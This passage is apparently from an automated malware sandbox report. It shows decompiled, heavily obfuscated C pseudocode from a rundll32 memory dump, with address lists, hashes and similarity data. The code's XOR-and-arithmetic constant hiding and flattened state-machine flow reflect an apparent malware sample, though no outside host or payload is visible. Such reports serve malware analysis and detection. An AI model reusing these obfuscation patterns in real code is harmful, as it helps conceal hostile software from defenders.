                                                                                                                      				_v16 =  *_t199 / _t404;
                                                                                                                      				_v16 = _v16 ^ 0x000ce393;
                                                                                                                      				_v88 = 0xe75d2;
                                                                                                                      				_v88 = _v88 + 0xe1a2;
                                                                                                                      				_v88 = _v88 ^ 0xbfa107b7;
                                                                                                                      				_v88 = _v88 ^ 0xbfa92cf6;
                                                                                                                      				_v40 = 0xb57020;
                                                                                                                      				_t405 = 0x18;
                                                                                                                      				_v40 = _v40 / _t405;
                                                                                                                      				_v40 = _v40 ^ 0x000d9612;
                                                                                                                      				_v80 = 0xaa39d6;
                                                                                                                      				_t406 = 0x4c;
                                                                                                                      				_v80 = _v80 / _t406;
                                                                                                                      				_t407 = 0x4f;
                                                                                                                      				_v80 = _v80 / _t407;
                                                                                                                      				_v80 = _v80 ^ 0x000dd886;
                                                                                                                      				_v84 = 0x7565b2;
                                                                                                                      				_v84 = _v84 ^ 0x85e60cd2;
                                                                                                                      				_v84 = _v84 | 0xe2f126fa;
                                                                                                                      				_v84 = _v84 ^ 0xe7fbef1f;
                                                                                                                      				_v92 = 0x20921c;
                                                                                                                      				_v92 = _v92 << 0xf;
                                                                                                                      				_t408 = 0x3d;
                                                                                                                      				_v92 = _v92 / _t408;
                                                                                                                      				_v92 = _v92 ^ 0x0137fd8d;
                                                                                                                      				_v104 = 0x7d1988;
                                                                                                                      				_v104 = _v104 | 0x48f8c783;
                                                                                                                      				_v104 = _v104 * 0x2a;
                                                                                                                      				_v104 = _v104 >> 4;
                                                                                                                      				_v104 = _v104 ^ 0x0f9ace16;
                                                                                                                      				_v32 = 0xc6b5a4;
                                                                                                                      				_v32 = _v32 ^ 0x611852a0;
                                                                                                                      				_v32 = _v32 ^ 0x61d9018e;
                                                                                                                      				_v24 = 0x4e0063;
                                                                                                                      				_v24 = _v24 * 0x56;
                                                                                                                      				_v24 = _v24 ^ 0x1a371aa3;
                                                                                                                      				_v60 = 0xb39a6a;
                                                                                                                      				_v60 = _v60 + 0x379a;
                                                                                                                      				_v60 = _v60 << 0xb;
                                                                                                                      				_v60 = _v60 ^ 0x9e9cdd6f;
                                                                                                                      				_v68 = 0xe7ba26;
                                                                                                                      				_v68 = _v68 + 0xffffbb05;
                                                                                                                      				_v68 = _v68 ^ 0xbd703087;
                                                                                                                      				_v68 = _v68 ^ 0xbd98ca1c;
                                                                                                                      				_v76 = 0x8102f3;
                                                                                                                      				_v76 = _v76 << 6;
                                                                                                                      				_v76 = _v76 * 0x7c;
                                                                                                                      				_v76 = _v76 ^ 0x9f574684;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t444 =  *0x365c90; // 0x0
                                                                                                                      					_t373 = 0x882fd94;
                                                                                                                      					do {
                                                                                                                      						if(_t452 == 0x68b0bf3) {
                                                                                                                      							_push(_t408);
                                                                                                                      							_push(_t408);
                                                                                                                      							_t409 = 0x28;
                                                                                                                      							_t377 = E00353512(_t409);
                                                                                                                      							 *0x365c90 = _t377;
                                                                                                                      							_t377[3] = 0x4000;
                                                                                                                      							_t410 =  *0x365c90; // 0x0
                                                                                                                      							_t381 = E00353512(_t410[3]);
                                                                                                                      							_t444 =  *0x365c90; // 0x0
                                                                                                                      							_t452 = 0xf7a4d1a;
                                                                                                                      							_t408 = _t381;
                                                                                                                      							_t383 = _t444[3] + _t408;
                                                                                                                      							__eflags = _t383;
                                                                                                                      							_t444[2] = _t408;
                                                                                                                      							_t444[1] = _t408;
                                                                                                                      							 *_t444 = _t408;
                                                                                                                      							_t444[5] = _t383;
                                                                                                                      							L12:
                                                                                                                      							_t373 = 0x882fd94;
                                                                                                                      							goto L13;
                                                                                                                      						}
                                                                                                                      						if(_t452 == _t373) {
                                                                                                                      							_t384 =  *0x365c90; // 0x0
                                                                                                                      							_t408 = _v20;
                                                                                                                      							_t385 = E0034C795(_t408, _v144, _v36, _t384[3], _t384[2], _v12, _v16, _v88);
                                                                                                                      							_t456 =  &(_t456[6]);
                                                                                                                      							__eflags = _t385 - _v72;
                                                                                                                      							if(__eflags != 0) {
                                                                                                                      								_t452 = 0xcb14d1c;
                                                                                                                      							} else {
                                                                                                                      								_t452 = 0xd2040d1;
                                                                                                                      								_t396 = 1;
                                                                                                                      							}
                                                                                                                      							goto L1;
                                                                                                                      						}
                                                                                                                      						if(_t452 == 0xcb14d1c) {
                                                                                                                      							E003468DE(_v84, _v92, _v104, _v32, _t444[2]);
                                                                                                                      							E003468DE(_v24, _v60, _v68, _v76,  *0x365c90);
                                                                                                                      							L17:
                                                                                                                      							return _t396;
                                                                                                                      						}
                                                                                                                      						if(_t452 == 0xd2040d1) {
                                                                                                                      							E00347027(_v40, _v100, _v12, _v80);
                                                                                                                      							goto L17;
                                                                                                                      						}
                                                                                                                      						_t463 = _t452 - 0xf7a4d1a;
                                                                                                                      						if(_t452 != 0xf7a4d1a) {
                                                                                                                      							goto L13;
                                                                                                                      						}
                                                                                                                      						_push(_v148);
                                                                                                                      						_push(_v28);
                                                                                                                      						_push(0x341324);
                                                                                                                      						E00350EDA(0, _v108, _v140, E0034AB66(_v124, _v56, _t463),  &_v12, _v64, _v96);
                                                                                                                      						_t408 = _v152;
                                                                                                                      						_t452 =  ==  ? 0x882fd94 : 0xcb14d1c;
                                                                                                                      						E0034AE03(_t408, _v116, _v44, _t390);
                                                                                                                      						_t444 =  *0x365c90; // 0x0
                                                                                                                      						_t456 =  &(_t456[0xa]);
                                                                                                                      						goto L12;
                                                                                                                      						L13:
                                                                                                                      					} while (_t452 != 0xd072e76);
                                                                                                                      					goto L17;
                                                                                                                      				}
                                                                                                                      			}
































































                                                                                                                      0x0035779d
                                                                                                                      0x003577a5
                                                                                                                      0x003577ad
                                                                                                                      0x003577b2
                                                                                                                      0x003577ba
                                                                                                                      0x003577c2
                                                                                                                      0x003577d8
                                                                                                                      0x003577df
                                                                                                                      0x003577ea
                                                                                                                      0x003577f5
                                                                                                                      0x00357800
                                                                                                                      0x0035780b
                                                                                                                      0x00357817
                                                                                                                      0x0035781c
                                                                                                                      0x00357822
                                                                                                                      0x0035782a
                                                                                                                      0x00357832
                                                                                                                      0x0035783a
                                                                                                                      0x00357845
                                                                                                                      0x0035784c
                                                                                                                      0x00357851
                                                                                                                      0x0035785a
                                                                                                                      0x00357865
                                                                                                                      0x0035786d
                                                                                                                      0x00357875
                                                                                                                      0x0035787d
                                                                                                                      0x00357885
                                                                                                                      0x00357897
                                                                                                                      0x0035789a
                                                                                                                      0x003578a1
                                                                                                                      0x003578ac
                                                                                                                      0x003578c1
                                                                                                                      0x003578c6
                                                                                                                      0x003578d0
                                                                                                                      0x003578d5
                                                                                                                      0x003578db
                                                                                                                      0x003578e3
                                                                                                                      0x003578eb
                                                                                                                      0x003578f3
                                                                                                                      0x003578fb
                                                                                                                      0x00357903
                                                                                                                      0x0035790b
                                                                                                                      0x00357914
                                                                                                                      0x00357917
                                                                                                                      0x0035791b
                                                                                                                      0x00357923
                                                                                                                      0x0035792b
                                                                                                                      0x00357938
                                                                                                                      0x0035793c
                                                                                                                      0x00357941
                                                                                                                      0x00357949
                                                                                                                      0x00357954
                                                                                                                      0x0035795f
                                                                                                                      0x0035796a
                                                                                                                      0x0035797d
                                                                                                                      0x00357984
                                                                                                                      0x0035798f
                                                                                                                      0x00357997
                                                                                                                      0x0035799f
                                                                                                                      0x003579a4
                                                                                                                      0x003579ac
                                                                                                                      0x003579b4
                                                                                                                      0x003579bc
                                                                                                                      0x003579c4
                                                                                                                      0x003579cc
                                                                                                                      0x003579d4
                                                                                                                      0x003579de
                                                                                                                      0x003579e2
                                                                                                                      0x003579ea
                                                                                                                      0x003579ea
                                                                                                                      0x003579ea
                                                                                                                      0x003579f0
                                                                                                                      0x003579f5
                                                                                                                      0x003579fb
                                                                                                                      0x00357afa
                                                                                                                      0x00357afb
                                                                                                                      0x00357afe
                                                                                                                      0x00357aff
                                                                                                                      0x00357b04
                                                                                                                      0x00357b09
                                                                                                                      0x00357b1f
                                                                                                                      0x00357b28
                                                                                                                      0x00357b2d
                                                                                                                      0x00357b33
                                                                                                                      0x00357b3a
                                                                                                                      0x00357b3f
                                                                                                                      0x00357b3f
                                                                                                                      0x00357b41
                                                                                                                      0x00357b44
                                                                                                                      0x00357b47
                                                                                                                      0x00357b49
                                                                                                                      0x00357b4c
                                                                                                                      0x00357b4c
                                                                                                                      0x00000000
                                                                                                                      0x00357b4c
                                                                                                                      0x00357a03
                                                                                                                      0x00357aa8
                                                                                                                      0x00357ac5
                                                                                                                      0x00357acc
                                                                                                                      0x00357ad1
                                                                                                                      0x00357ad4
                                                                                                                      0x00357ad8
                                                                                                                      0x00357ae7
                                                                                                                      0x00357ada
                                                                                                                      0x00357adc
                                                                                                                      0x00357ae1
                                                                                                                      0x00357ae1
                                                                                                                      0x00000000
                                                                                                                      0x00357ad8
                                                                                                                      0x00357a0b
                                                                                                                      0x00357b94
                                                                                                                      0x00357bb5
                                                                                                                      0x00357bc0
                                                                                                                      0x00357bc9
                                                                                                                      0x00357bc9
                                                                                                                      0x00357a17
                                                                                                                      0x00357b75
                                                                                                                      0x00000000
                                                                                                                      0x00357b7b
                                                                                                                      0x00357a1d
                                                                                                                      0x00357a23
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00357a29
                                                                                                                      0x00357a2d
                                                                                                                      0x00357a3c
                                                                                                                      0x00357a63
                                                                                                                      0x00357a83
                                                                                                                      0x00357a87
                                                                                                                      0x00357a8a
                                                                                                                      0x00357a8f
                                                                                                                      0x00357a95
                                                                                                                      0x00000000
                                                                                                                      0x00357b51
                                                                                                                      0x00357b51
                                                                                                                      0x00000000
                                                                                                                      0x00357b5d

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: V$!<z$-.$4R$FfF$Kg$c$j5$wZ9H
                                                                                                                      • API String ID: 0-3223435920
                                                                                                                      • Opcode ID: 256ad68d022f922edb0e346c70836e7fa0ac50b1ebd2725aaaf414a8ada4684b
                                                                                                                      • Instruction ID: 04e838dcc1847c5b2267ffcfe16646a15d6def0b7387cb14e0dfe67a53658272
                                                                                                                      • Opcode Fuzzy Hash: 256ad68d022f922edb0e346c70836e7fa0ac50b1ebd2725aaaf414a8ada4684b
                                                                                                                      • Instruction Fuzzy Hash: 8C0221715083808FD3A9CF25D48AA4BFBF2FBC5718F50891DF6998A261D7B58948CF02
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E0035ACD3(intOrPtr* __ecx) {
                                                                                                                      				intOrPtr _v4;
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				intOrPtr* _v12;
                                                                                                                      				char _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				void* _t358;
                                                                                                                      				void* _t359;
                                                                                                                      				intOrPtr _t360;
                                                                                                                      				void* _t366;
                                                                                                                      				void* _t375;
                                                                                                                      				signed int _t378;
                                                                                                                      				signed int _t379;
                                                                                                                      				signed int _t380;
                                                                                                                      				signed int _t381;
                                                                                                                      				signed int _t382;
                                                                                                                      				signed int _t383;
                                                                                                                      				signed int _t384;
                                                                                                                      				signed int _t385;
                                                                                                                      				intOrPtr* _t426;
                                                                                                                      				intOrPtr _t430;
                                                                                                                      				signed int* _t431;
                                                                                                                      
                                                                                                                      				_t431 =  &_v160;
                                                                                                                      				_t426 = __ecx;
                                                                                                                      				_v12 = __ecx;
                                                                                                                      				_v8 = 0x8c571a;
                                                                                                                      				_t430 = 0;
                                                                                                                      				_t375 = 0x79707ab;
                                                                                                                      				_v4 = 0;
                                                                                                                      				_v64 = 0xfc5ff;
                                                                                                                      				_v64 = _v64 >> 6;
                                                                                                                      				_v64 = _v64 ^ 0x00003f17;
                                                                                                                      				_v140 = 0x873397;
                                                                                                                      				_v140 = _v140 * 0x50;
                                                                                                                      				_v140 = _v140 << 5;
                                                                                                                      				_v140 = _v140 << 4;
                                                                                                                      				_v140 = _v140 ^ 0x803e6000;
                                                                                                                      				_v112 = 0x5cc448;
                                                                                                                      				_v112 = _v112 | 0xb5fdf5b7;
                                                                                                                      				_v112 = _v112 >> 9;
                                                                                                                      				_v112 = _v112 ^ 0x005afefa;
                                                                                                                      				_v60 = 0x19d054;
                                                                                                                      				_t378 = 0x29;
                                                                                                                      				_v60 = _v60 / _t378;
                                                                                                                      				_v60 = _v60 ^ 0x0000a12d;
                                                                                                                      				_v40 = 0x4c7c9b;
                                                                                                                      				_t379 = 0x7b;
                                                                                                                      				_v40 = _v40 / _t379;
                                                                                                                      				_v40 = _v40 ^ 0x00009f31;
                                                                                                                      				_v88 = 0xb88e01;
                                                                                                                      				_v88 = _v88 << 8;
                                                                                                                      				_v88 = _v88 | 0xb280bd16;
                                                                                                                      				_v88 = _v88 ^ 0xba886110;
                                                                                                                      				_v80 = 0xf71efc;
                                                                                                                      				_v80 = _v80 << 9;
                                                                                                                      				_t380 = 0x34;
                                                                                                                      				_v80 = _v80 / _t380;
                                                                                                                      				_v80 = _v80 ^ 0x04950844;
                                                                                                                      				_v96 = 0xf5fda;
                                                                                                                      				_v96 = _v96 >> 7;
                                                                                                                      				_t381 = 0x11;
                                                                                                                      				_v96 = _v96 * 0x46;
                                                                                                                      				_v96 = _v96 ^ 0x00041aa2;
                                                                                                                      				_v156 = 0x96c5de;
                                                                                                                      				_v156 = _v156 / _t381;
                                                                                                                      				_v156 = _v156 ^ 0x88ccdc31;
                                                                                                                      				_v156 = _v156 * 0x3d;
                                                                                                                      				_v156 = _v156 ^ 0x96be8a04;
                                                                                                                      				_v72 = 0x71396c;
                                                                                                                      				_v72 = _v72 << 0xa;
                                                                                                                      				_v72 = _v72 ^ 0x367e7763;
                                                                                                                      				_v72 = _v72 ^ 0xf298a4dc;
                                                                                                                      				_v148 = 0xd59d39;
                                                                                                                      				_v148 = _v148 >> 6;
                                                                                                                      				_v148 = _v148 + 0xffff0863;
                                                                                                                      				_v148 = _v148 << 4;
                                                                                                                      				_v148 = _v148 ^ 0x0020b4d1;
                                                                                                                      				_v116 = 0x4e2a72;
                                                                                                                      				_v116 = _v116 ^ 0x41f61916;
                                                                                                                      				_t382 = 0x66;
                                                                                                                      				_v116 = _v116 / _t382;
                                                                                                                      				_v116 = _v116 ^ 0xb72c0337;
                                                                                                                      				_v116 = _v116 ^ 0xb7828c59;
                                                                                                                      				_v28 = 0x7f34ff;
                                                                                                                      				_v28 = _v28 << 9;
                                                                                                                      				_v28 = _v28 ^ 0xfe6bca43;
                                                                                                                      				_v124 = 0x9f58a2;
                                                                                                                      				_v124 = _v124 + 0xffff9c37;
                                                                                                                      				_v124 = _v124 + 0x725a;
                                                                                                                      				_v124 = _v124 << 7;
                                                                                                                      				_v124 = _v124 ^ 0x4fb1837f;
                                                                                                                      				_v52 = 0xa9f0c8;
                                                                                                                      				_v52 = _v52 + 0xfffffc3c;
                                                                                                                      				_v52 = _v52 ^ 0x00ad5534;
                                                                                                                      				_v24 = 0xa43c6e;
                                                                                                                      				_t383 = 0x6e;
                                                                                                                      				_v24 = _v24 * 0x5b;
                                                                                                                      				_v24 = _v24 ^ 0x3a644c1a;
                                                                                                                      				_v132 = 0x7fb628;
                                                                                                                      				_v132 = _v132 * 0xb;
                                                                                                                      				_v132 = _v132 << 6;
                                                                                                                      				_v132 = _v132 << 0xd;
                                                                                                                      				_v132 = _v132 ^ 0x9dcf3d61;
                                                                                                                      				_v100 = 0x597f63;
                                                                                                                      				_v100 = _v100 | 0xd4d51309;
                                                                                                                      				_v100 = _v100 << 9;
                                                                                                                      				_v100 = _v100 ^ 0xbafad16c;
                                                                                                                      				_v108 = 0x4d061a;
                                                                                                                      				_v108 = _v108 >> 2;
                                                                                                                      				_v108 = _v108 ^ 0xd197d397;
                                                                                                                      				_v108 = _v108 + 0xffff042d;
                                                                                                                      				_v108 = _v108 ^ 0xd1833bae;
                                                                                                                      				_v20 = 0x2586e5;
                                                                                                                      				_v20 = _v20 + 0x8581;
                                                                                                                      				_v20 = _v20 ^ 0x0026b83c;
                                                                                                                      				_v92 = 0x3ae4f5;
                                                                                                                      				_v92 = _v92 << 1;
                                                                                                                      				_v92 = _v92 << 0xb;
                                                                                                                      				_v92 = _v92 ^ 0xae4bd9c6;
                                                                                                                      				_v44 = 0xe6dc30;
                                                                                                                      				_v44 = _v44 ^ 0xd3982ed3;
                                                                                                                      				_v44 = _v44 ^ 0xd37e8c85;
                                                                                                                      				_v144 = 0xe42628;
                                                                                                                      				_v144 = _v144 | 0xc37700ac;
                                                                                                                      				_v144 = _v144 >> 0xa;
                                                                                                                      				_v144 = _v144 << 0xc;
                                                                                                                      				_v144 = _v144 ^ 0x0fd23fe2;
                                                                                                                      				_v152 = 0x41402a;
                                                                                                                      				_t186 =  &_v152; // 0x41402a
                                                                                                                      				_t384 = 0x19;
                                                                                                                      				_v152 =  *_t186 / _t383;
                                                                                                                      				_v152 = _v152 * 0x6a;
                                                                                                                      				_v152 = _v152 ^ 0x2485591b;
                                                                                                                      				_v152 = _v152 ^ 0x24bff8d4;
                                                                                                                      				_v160 = 0xbf0758;
                                                                                                                      				_v160 = _v160 + 0x522b;
                                                                                                                      				_v160 = _v160 >> 0xe;
                                                                                                                      				_v160 = _v160 + 0xffff65d4;
                                                                                                                      				_v160 = _v160 ^ 0xfff1feea;
                                                                                                                      				_v84 = 0x1a9ecc;
                                                                                                                      				_v84 = _v84 << 0x10;
                                                                                                                      				_t385 = 0x2d;
                                                                                                                      				_v84 = _v84 / _t384;
                                                                                                                      				_v84 = _v84 ^ 0x065118ef;
                                                                                                                      				_v120 = 0x6a6625;
                                                                                                                      				_t219 =  &_v120; // 0x6a6625
                                                                                                                      				_v120 =  *_t219 / _t385;
                                                                                                                      				_v120 = _v120 >> 0xd;
                                                                                                                      				_v120 = _v120 + 0x1650;
                                                                                                                      				_v120 = _v120 ^ 0x00013394;
                                                                                                                      				_v76 = 0x6cd503;
                                                                                                                      				_v76 = _v76 + 0xffff64c6;
                                                                                                                      				_v76 = _v76 * 0x17;
                                                                                                                      				_v76 = _v76 ^ 0x09bb62c3;
                                                                                                                      				_v128 = 0x4363ee;
                                                                                                                      				_v128 = _v128 | 0x70162fad;
                                                                                                                      				_v128 = _v128 * 0x15;
                                                                                                                      				_v128 = _v128 + 0xffff87d6;
                                                                                                                      				_v128 = _v128 ^ 0x372e6b7a;
                                                                                                                      				_v36 = 0xd9ddf9;
                                                                                                                      				_v36 = _v36 << 5;
                                                                                                                      				_v36 = _v36 ^ 0x1b34c995;
                                                                                                                      				_v136 = 0xc7126f;
                                                                                                                      				_v136 = _v136 << 3;
                                                                                                                      				_v136 = _v136 >> 6;
                                                                                                                      				_v136 = _v136 + 0x2e5f;
                                                                                                                      				_v136 = _v136 ^ 0x001d82e9;
                                                                                                                      				_v104 = 0x7714f2;
                                                                                                                      				_v104 = _v104 << 2;
                                                                                                                      				_v104 = _v104 * 5;
                                                                                                                      				_t358 = 0x5786d8d;
                                                                                                                      				_v104 = _v104 | 0x0a59959c;
                                                                                                                      				_v104 = _v104 ^ 0x0b5ace50;
                                                                                                                      				_v68 = 0x585054;
                                                                                                                      				_v68 = _v68 ^ 0x33c1c88e;
                                                                                                                      				_v68 = _v68 ^ 0x9bceaa07;
                                                                                                                      				_v68 = _v68 ^ 0xa855990f;
                                                                                                                      				_v56 = 0xa2136b;
                                                                                                                      				_v56 = _v56 + 0x4ebb;
                                                                                                                      				_v56 = _v56 ^ 0x00a98962;
                                                                                                                      				_v32 = 0x51a57b;
                                                                                                                      				_v32 = _v32 >> 0xe;
                                                                                                                      				_v32 = _v32 ^ 0x0002096e;
                                                                                                                      				_v48 = 0x9fd766;
                                                                                                                      				_v48 = _v48 | 0x00a10b6a;
                                                                                                                      				_v48 = _v48 ^ 0x00bfd9fa;
                                                                                                                      				do {
                                                                                                                      					while(_t375 != _t358) {
                                                                                                                      						if(_t375 == 0x79707ab) {
                                                                                                                      							_t375 = 0x7c4530c;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t375 == 0x7c4530c) {
                                                                                                                      								_push(_v156);
                                                                                                                      								_push(_v96);
                                                                                                                      								_push(0x341678);
                                                                                                                      								_t366 = E0034AB66(_v88, _v80, __eflags);
                                                                                                                      								_push(_v28);
                                                                                                                      								_push(_v116);
                                                                                                                      								_t302 =  &_v148; // 0x372e6b7a
                                                                                                                      								_push(0x341538);
                                                                                                                      								__eflags = E00350EDA(E0034AB66(_v72,  *_t302, __eflags), _v64, _v124, _t366,  &_v16, _v52, _v24) - _v140;
                                                                                                                      								_t375 =  ==  ? 0x5786d8d : 0xbb932f6;
                                                                                                                      								E0034AE03(_v132, _v100, _v108, _t366);
                                                                                                                      								E0034AE03(_v20, _v92, _v44, _t367);
                                                                                                                      								_t426 = _v12;
                                                                                                                      								_t431 =  &(_t431[0xf]);
                                                                                                                      								L10:
                                                                                                                      								_t358 = 0x5786d8d;
                                                                                                                      								goto L11;
                                                                                                                      							} else {
                                                                                                                      								if(_t375 != 0xfc0b370) {
                                                                                                                      									goto L11;
                                                                                                                      								} else {
                                                                                                                      									E00347027(_v32, _v40, _v16, _v48);
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L6:
                                                                                                                      						return _t430;
                                                                                                                      					}
                                                                                                                      					_push(_v84);
                                                                                                                      					_push(_v160);
                                                                                                                      					_push(0x341588);
                                                                                                                      					_t359 = E0034AB66(_v144, _v152, __eflags);
                                                                                                                      					_t360 =  *0x365c9c; // 0x0
                                                                                                                      					__eflags = E0035F9E2(_v112, _v120, _v16,  *_t426, _v76, _v144, _v128,  *((intOrPtr*)(_t426 + 4)), _v36, _v136, _t359, _t360 + 8) - _v60;
                                                                                                                      					_t375 = 0xfc0b370;
                                                                                                                      					_t430 =  ==  ? 1 : _t430;
                                                                                                                      					E0034AE03(_v104, _v68, _v56, _t359);
                                                                                                                      					_t431 =  &(_t431[0xf]);
                                                                                                                      					goto L10;
                                                                                                                      					L11:
                                                                                                                      					__eflags = _t375 - 0xbb932f6;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L6;
                                                                                                                      			}
                                                                                                                      0x0035adc7
                                                                                                                      0x0035add0
                                                                                                                      0x0035add5
                                                                                                                      0x0035addb
                                                                                                                      0x0035ade3
                                                                                                                      0x0035adeb
                                                                                                                      0x0035adf5
                                                                                                                      0x0035adf6
                                                                                                                      0x0035adfa
                                                                                                                      0x0035ae02
                                                                                                                      0x0035ae10
                                                                                                                      0x0035ae14
                                                                                                                      0x0035ae21
                                                                                                                      0x0035ae25
                                                                                                                      0x0035ae2d
                                                                                                                      0x0035ae35
                                                                                                                      0x0035ae3a
                                                                                                                      0x0035ae42
                                                                                                                      0x0035ae4a
                                                                                                                      0x0035ae52
                                                                                                                      0x0035ae57
                                                                                                                      0x0035ae5f
                                                                                                                      0x0035ae64
                                                                                                                      0x0035ae6c
                                                                                                                      0x0035ae74
                                                                                                                      0x0035ae84
                                                                                                                      0x0035ae89
                                                                                                                      0x0035ae8f
                                                                                                                      0x0035ae97
                                                                                                                      0x0035ae9f
                                                                                                                      0x0035aeaa
                                                                                                                      0x0035aeb2
                                                                                                                      0x0035aebd
                                                                                                                      0x0035aec5
                                                                                                                      0x0035aecd
                                                                                                                      0x0035aed5
                                                                                                                      0x0035aeda
                                                                                                                      0x0035aee2
                                                                                                                      0x0035aeed
                                                                                                                      0x0035aef8
                                                                                                                      0x0035af03
                                                                                                                      0x0035af16
                                                                                                                      0x0035af19
                                                                                                                      0x0035af20
                                                                                                                      0x0035af2b
                                                                                                                      0x0035af38
                                                                                                                      0x0035af3c
                                                                                                                      0x0035af41
                                                                                                                      0x0035af46
                                                                                                                      0x0035af4e
                                                                                                                      0x0035af56
                                                                                                                      0x0035af5e
                                                                                                                      0x0035af63
                                                                                                                      0x0035af6b
                                                                                                                      0x0035af73
                                                                                                                      0x0035af78
                                                                                                                      0x0035af80
                                                                                                                      0x0035af88
                                                                                                                      0x0035af90
                                                                                                                      0x0035af9b
                                                                                                                      0x0035afa6
                                                                                                                      0x0035afb1
                                                                                                                      0x0035afb9
                                                                                                                      0x0035afbd
                                                                                                                      0x0035afc2
                                                                                                                      0x0035afca
                                                                                                                      0x0035afd5
                                                                                                                      0x0035afe0
                                                                                                                      0x0035afeb
                                                                                                                      0x0035aff3
                                                                                                                      0x0035affb
                                                                                                                      0x0035b000
                                                                                                                      0x0035b005
                                                                                                                      0x0035b00d
                                                                                                                      0x0035b015
                                                                                                                      0x0035b01b
                                                                                                                      0x0035b01c
                                                                                                                      0x0035b029
                                                                                                                      0x0035b02d
                                                                                                                      0x0035b035
                                                                                                                      0x0035b03d
                                                                                                                      0x0035b045
                                                                                                                      0x0035b04d
                                                                                                                      0x0035b052
                                                                                                                      0x0035b05a
                                                                                                                      0x0035b062
                                                                                                                      0x0035b06a
                                                                                                                      0x0035b075
                                                                                                                      0x0035b076
                                                                                                                      0x0035b07a
                                                                                                                      0x0035b084
                                                                                                                      0x0035b08c
                                                                                                                      0x0035b092
                                                                                                                      0x0035b096
                                                                                                                      0x0035b09b
                                                                                                                      0x0035b0a3
                                                                                                                      0x0035b0ab
                                                                                                                      0x0035b0b3
                                                                                                                      0x0035b0c0
                                                                                                                      0x0035b0c4
                                                                                                                      0x0035b0cc
                                                                                                                      0x0035b0d4
                                                                                                                      0x0035b0e1
                                                                                                                      0x0035b0e5
                                                                                                                      0x0035b0ed
                                                                                                                      0x0035b0f5
                                                                                                                      0x0035b100
                                                                                                                      0x0035b108
                                                                                                                      0x0035b113
                                                                                                                      0x0035b11b
                                                                                                                      0x0035b120
                                                                                                                      0x0035b125
                                                                                                                      0x0035b12d
                                                                                                                      0x0035b135
                                                                                                                      0x0035b13d
                                                                                                                      0x0035b147
                                                                                                                      0x0035b14b
                                                                                                                      0x0035b150
                                                                                                                      0x0035b158
                                                                                                                      0x0035b160
                                                                                                                      0x0035b168
                                                                                                                      0x0035b170
                                                                                                                      0x0035b178
                                                                                                                      0x0035b180
                                                                                                                      0x0035b188
                                                                                                                      0x0035b190
                                                                                                                      0x0035b198
                                                                                                                      0x0035b1a3
                                                                                                                      0x0035b1ab
                                                                                                                      0x0035b1b6
                                                                                                                      0x0035b1c1
                                                                                                                      0x0035b1cc
                                                                                                                      0x0035b1d7
                                                                                                                      0x0035b1d7
                                                                                                                      0x0035b1e5
                                                                                                                      0x0035b2e7
                                                                                                                      0x00000000
                                                                                                                      0x0035b1eb
                                                                                                                      0x0035b1f1
                                                                                                                      0x0035b22f
                                                                                                                      0x0035b233
                                                                                                                      0x0035b23f
                                                                                                                      0x0035b244
                                                                                                                      0x0035b249
                                                                                                                      0x0035b252
                                                                                                                      0x0035b256
                                                                                                                      0x0035b25e
                                                                                                                      0x0035b29e
                                                                                                                      0x0035b2b5
                                                                                                                      0x0035b2b8
                                                                                                                      0x0035b2d3
                                                                                                                      0x0035b2d8
                                                                                                                      0x0035b2df
                                                                                                                      0x0035b37b
                                                                                                                      0x0035b37b
                                                                                                                      0x00000000
                                                                                                                      0x0035b1f3
                                                                                                                      0x0035b1f9
                                                                                                                      0x00000000
                                                                                                                      0x0035b1ff
                                                                                                                      0x0035b21b
                                                                                                                      0x0035b221
                                                                                                                      0x0035b1f9
                                                                                                                      0x0035b1f1
                                                                                                                      0x0035b224
                                                                                                                      0x0035b22e
                                                                                                                      0x0035b22e
                                                                                                                      0x0035b2f1
                                                                                                                      0x0035b2f5
                                                                                                                      0x0035b301
                                                                                                                      0x0035b306
                                                                                                                      0x0035b310
                                                                                                                      0x0035b356
                                                                                                                      0x0035b358
                                                                                                                      0x0035b365
                                                                                                                      0x0035b373
                                                                                                                      0x0035b378
                                                                                                                      0x00000000
                                                                                                                      0x0035b380
                                                                                                                      0x0035b380
                                                                                                                      0x0035b380
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
